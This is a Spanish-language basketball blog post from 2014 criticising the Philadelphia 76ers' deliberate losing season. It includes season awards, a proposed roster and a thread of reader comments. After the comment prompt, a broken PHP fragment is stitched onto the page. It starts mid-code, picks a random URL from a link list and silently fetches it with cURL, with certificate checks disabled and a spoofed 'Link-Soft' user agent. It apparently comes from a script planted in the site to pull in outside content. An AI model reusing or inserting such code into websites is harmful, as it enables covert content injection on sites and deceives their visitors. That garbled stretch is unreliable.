Philadelphia 76ers: Muy deficiente

15 de June de 2014 por TheDeerHunter

Caso flagrante del tankeo más salvaje y censurable. Patada al espíritu competitivo, una vergonzosa adulteración. No bastaba con diseñar durante el verano un equipo con el único objetivo de obtener los peores resultados posibles (“el peor equipo de la historia”, dijimos). De manera increible iniciaron la temporada con 3 victorias consecutivas (la primera nada más y nada menos que frente a Miami) lo que debió de llenar de pavor a la directiva y les convenció de que había que terminar el trabajo a mitad de temporada traspasando lo poco útil que quedara para poder presentar auténticos combinados de la D-League. Sorprende que no se haya batido algún récord de derrotas y que ni siquiera hayan terminado últimos, como también que aún haya habido gente dispuesta a pagar por asistir a semejante tortura de partidos. 18 perdidos por más de 20 puntos y 8 de ellos por más de 30. El dudoso honor de ser los peores en casi todo. Es este tipo de actitudes el que año tras año nos hace dudar del actual sistema de lotería.

Como premio a lo “aplicados” que han sido obtienen la tercera elección del draft 2014 lo que en teoría les garantiza un talento descomunal y un jugador franquicia para liderar el futuro inmediato. A él habrá que añadir a un rival para el rookie del año como Nerlens Noel, a quien deberían recuperar tras todo el curso en el dique seco y, por último, al flamante ROY Michael Carter-Williams. Tremendo big three de jóvenes, sin parangón desde los Thunder de Durant, Green y Westbrook del 2008… O al menos eso es lo que se vende. 

A partir de aquí la nada más absoluta. Únicamente 7 contratos garantizados para la próxima temporada y la mitad en el escaparate o incluso camino del buyout. El resto, expirings de incierta continuidad y una flexibilidad salarial intimidatoria. Sin embargo, no parece que su intención sea dinamitar el mercado durante este mismo verano. Al contrario, se especula con que pueden “alquilar” espacio salarial al mejor postor, aceptando contratos tóxicos a corto plazo o ejerciendo de “facilitadores” de otros traspasos, a cambio por supuesto de activos futuribles. Su offseason objetivo debería ser, si toda va bien,  la siguiente, la del 2016.

De esta manera en el punto de mira vuelve a estar el número 1 del draft del 2015 o el mayor número de papeletas para obtenerlo. La mejora del juego y resultados, por tanto, seguirá en un lamentable segundo plano. Exceptuando a Carter-Williams, Noel e, indudablemente, quienes terminen eligiendo en los dos picks de primera ronda, todos en Philadelphia son prescindibles, empezando por Thaddeus Young, el mejor pagado de la actual plantilla y único superviviente a las sucesivas podas. Saldrá con toda seguridad a subasta, más que nada por su atractivo cartel y su teórica incompatibilidad con Noel. Mullens y Richardson cuentan con player option, pero en todo caso serán cortados. Wroten y Moultrie, por la naturaleza flexible de sus contratos, seguirán en el equipo siempre que no se les encuentre utilidad como complemento en algún traspaso.

No somos General Manager profesionales pero nos atreveríamos a afirmar que con 6-7 jugadores no se afronta con garantías una temporada de 82 partidos ni con toda la intención del mundo de hacer el ridículo. Los Sixers tienen trabajo por delante para completar la plantilla con retales “baratos” en contratos de corto recorrido. Por suerte no están obligados a ser excesivamente minuciosos pues les vale de todo y con poco mejora lo que tenían. Como si importara mucho.

PREMIOS

MVP: Tras siete temporadas en Philadelphia y 9 millones de dólares por cobrar los Sixers sacarán el último provecho de Thaddeus Young con un traspaso. El bueno de Thaddeus ha hecho bien dedicándose a darse brillo, erigiéndose por fin como el primer espada que todo el mundo esperaba tras su segundo año. Con sus 18 puntos por partido, 6 rebotes, 2 asistencias y 2 robos ha vuelto a cuajar una notable campaña, cerrando una simbiosis con los Sixers algo decepcionante durante la etapa que le ha tocado vivir allí.

Rookie: Poco que añadir. Michael Carter-Williams (16.7p – 6.2r – 6.3a – 1.9r) ha sido el rookie del año. Excelente para una 11ª elección de primera ronda. Eso sí, ha disfrutado de un protagonismo exagerado consecuencia de la planificación y la competencia tanto en su equipo como en la carrera por el premio ha sido bastante mediocre. Debe mejorar su tiro.

Sorpresa: No ha sido una temporada para descubrir nuevas sensaciones baloncestísticas más allá de los pertinentes cabreos. Eso sí, siempre ha habido un puntito de emoción a la hora de averiguar quién demonios jugaría cada noche. Hasta 23 jugadores han sido utilizados esta temporada. Algunos de ellos con nombres tan molones como Casper Ware, Jarvis Varnado, Adonis Thomas, Dewayne Dedmon, James Nunnally… En cualquier caso si alguien ha dado el callo de forma inesperada ese ha sido Henry Sims (11.8p – 7r).

Decepción: Definitivamente se cerró el periplo de Evan Turner (17.4p – 6r – 3.7a – 1r) en Philadelphia. Toda una 2ª elección del año 2010 (George, Cousins, Monroe…)  que no ha dejado más que sinsabores. Por no dejar tampoco salió en un traspaso favorable. Una triste 2ª ronda y un Granger a quién no querían ver ni en pintura. Últimamente no lo venía haciendo mal pero visto su rendimiento en Indiana no se puede pensar que se equivocaran quitándoselo de encima. Más bien cuando le eligieron.

Esfuerzo en vano: Supongo que es injusto trivializar con el grupo de chavales al que le ha tocado la papeleta de defender la camiseta de los Sixers durante los últimos meses. La mayoría de ellos probablemente no jugará nunca más en la NBA. Desconocemos si es el caso de Hollis Thompson, quién terminó siendo titular indiscutible. Termina contrato y sus números no son para matarse por renovarlo pero seguro que se dejó la piel como para ganarse la confianza de su técnico.

JUGANDO A GM

Asumiendo que los Cavs elegirán a Joel Embiid solo quedará esperar a ver a quien no eligen los Bucks. Se comenta que su elección soñada sería Andrew Wiggins, aunque claro no depende de ellos. En la décima elección de primera ronda podrían completar su backcourt con un escolta. Nik Stauskas o Gary Harris darían el perfil.

Llamadme romántico pero como mínimo habría que renovar a Henry Sims. No será muy caro y ha presentado un interesante desempeño. Tanto James Anderson como Hollis Thompson también han hecho sus méritos pero dependen mucho más de los fichajes que se vayan haciendo.

Para completar ficharía un buen núcleo de veteranos que sean capaz de arropar al joven núcleo. Por dinero no va a ser y muchos de ellos no van a tener ganas de forzar largos contratos. Buscamos ética profesional y trabajo en equipo. Incluso puede que se encuentren en un rol de cierta importancia donde se sientan a gusto. Me viene a la cabeza nombres como Steve Blake, Shane Battier y Nazr Mohammed.

Por último, para dirigir el barco, podría valer cualquiera atendiendo a los objetivos. Bett Brown ha manejado con cierta dignidad la situación y, de no haber sido por los recortes de plantilla a mitad de campaña y por algunas lesiones quizá no estaríamos hablando en estos términos. Recordemos que llegó a tocar balance positivo e incluso un aceptable 12-21 en Enero.

Así, nos quedará posiblemente otro candidato a “peor equipo de la historia” pero con interesante potencial:

PG: Michael Carter-Williams, Steve Blake
SG: Nik Stauskas, Tony Wroten, James Anderson
SF: Andrew Wiggins, Shane Battier, Hollis Thompson
PF: Nerlens Noel, Arnett Moultrie
C: Henry Sims, Nazr Mohammed

Comenta

14 comentarios a esta entrada

  1. Mamba_Blanca dice:
    #1

    En la mayoría de los mock dan a Aaron Gordon como la elección 10 de los Sixers haciendo jugar a Noel de Center

      Citar

  2. Denise dice:
    #2

    Suponiendo que los 76ers no van a asaltar el mercado de agentes libres, veo muy dificil que un tio como Battier harto de jugar finales en los últimos años se vaya a un equipo de lotería.

      Citar

  3. Esteban dice:
    #3

    me parece sobredimensionado el trio de los tres “grandes”

    siempre he dudado de Noel, habra que verlo, pero no es alguien en que deposite confianza

    dentro de un pesimo draft, MCW termina por ser un gran acierto, pero creo que sus numeros estan muy muy inflados y su nivel decayo enormemente en la segunda mitad del curso, no me parece q llegue a ser un jugador franquicia

    se esta hablando de problemas fisicos de Embidd, si los cavs y los bucks lo dejan pasar y se llevan a parker y wiggins, deberian intentar ellos con Embidd a quien veo poco compatible con noel

    ojala que todo les salga mal, seria un buen castigo por ser tan descarados en su tankeo

      Citar

  4. Jose Luis dice:
    #4

    Esteban, eso es como desearle al Miami Heat quedarse sin ninguna estrella en 2010 por tener tantos expirings. Se trabaja para un objetivo, y ellos lo han cumplido. Noel, Carter Williams, un nº3 del draft y nº10 del draft, y una ronda probablemente muy buena el año que viene. Muy bien gestionado. Quizá ninguno sea una superestrella, pero MCW tiene pinta de base top15 en los próximos años, y puede llegar al top10 fácilmente creo.

    han montado un buen equipo joven, ya después es medio tener suerte medio tener ojo.

      Citar

  5. TheDeerHunter dice:
    #5

    Denise:
    Suponiendo que los 76ers no van a asaltar el mercado de agentes libres, veo muy dificil que un tio como Battier harto de jugar finales en los últimos años se vaya a un equipo de lotería.

    Bueno… para empezar mencionaba a Battier como podría haber nombrado a varios otros de perfil parecido, pero si hablamos concretamente de Battier veo muy difícil que siga contando para ningún contender.
    Los Sixers tienen dinero de sobra para ofrecer jugosos contratos cortos a determinados agentes. No les dolerá demasiado ofrecer más pasta que nadie a este tipo de jugadores. Para veteranos de esta categoría un papel de mentor como éste y bien remunerado puede ser una bicoca.

      Citar

  6. diestro dice:
    #6

    Battier creo que ha anunciado su retirada, pero seguramente donde pone Battier, se refiere más al perfil de jugador.

      Citar

  7. TheDeerHunter dice:
    #7

    diestro:
    Battier creo que ha anunciado su retirada, pero seguramente donde pone Battier, se refiere más al perfil de jugador.

    No lo sabía, pero efectivamente es como dices.

      Citar

  8. Ruxixon dice:
    #8

    Pues debo reconocer que en Philadephia me gustaría ver una dupla Norel-Embiid (si Cavs pasan,los 76ers tienen que cogerlo si o si,ya que Jabari tiene toda la pinta de Bucks) con McDermott de 3 en plan metralleta y solucionando el déficit de T3 del roster.Perderían mucho,pero yo los vería cada 2 por 3,jaja.

    De todas formas esa sonada apuesta por Wiggins dando el pick 3 + pick 10 por la primera elección de Cleveland,aunque me parece un error mayúsculo,parece dejar a las claras que otro añito de tanking y Okafor para el año que viene.

      Citar

  9. Viva_Dirk dice:
    #9

    Me imagino a Noel jugando de 4 y me da un ataque, mas aun si el center con el que comparte pista es Embiid. La verdad es que si les llega Wiggins tienen muy buena pinta si Noel está sano y el GM hace las cosas medio bien, tienen pasta y una base con MCW-Wiggins-Thaddeus-Noel que suena bien. Es otro equipo que debería ofrecerle un pastón a Stephenson, y es que los escoltas escasean muchísimo.

    Si hacen un traspaso por Thaddeus algo llegará al equipo, no?

      Citar

  10. Ruxixon dice:
    #10

    Pero es que seguramente estés sólo pensando en el apartado ofensivo.Yo si lo veo y mucho,Noel no va a tener impacto ofensivo ni de 4 ni de 5,y sus puntos vendrán de segundas oportunidades tras rebote o al contraataque,o porque se la den debajo del aro.Es en defensa donde Noel es diferencial y gracias a su agilidad y explosividad podría coger sin problemas a los 4 rivales,además que a él le vendrá mejor porque así se evita cubrir a los centers más pesados de la liga.Todo esto con las reservas de su estado físico después de la lesión.

    Por contra Embiid es mucho más generador en la ofensiva y sin tener unas skills defensivas de la leche,sólo por intimidación ya protegería la zona.

      Citar

  11. txusma dice:
    #11

    Pues yo no sé si Stephenson es lo mejor para equipos jóvenes en reconstrucción. Tiene pinta de incendiar el vestuario a la mínima.

      Citar

  12. Jose Luis dice:
    #12

    +1 txusma, y de creere más aún el mejor del equipo

    encajaría en los Spurs, aunque suene raro

      Citar

  13. Jose Luis dice:
    #13

    quise decir creerse*

      Citar

  14. Viva_Dirk dice:
    #14

    La descripción que hace Ruxixon es la de Ben Wallace, que siempre fue un center, aunque pudiera defender a ala-pivots.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>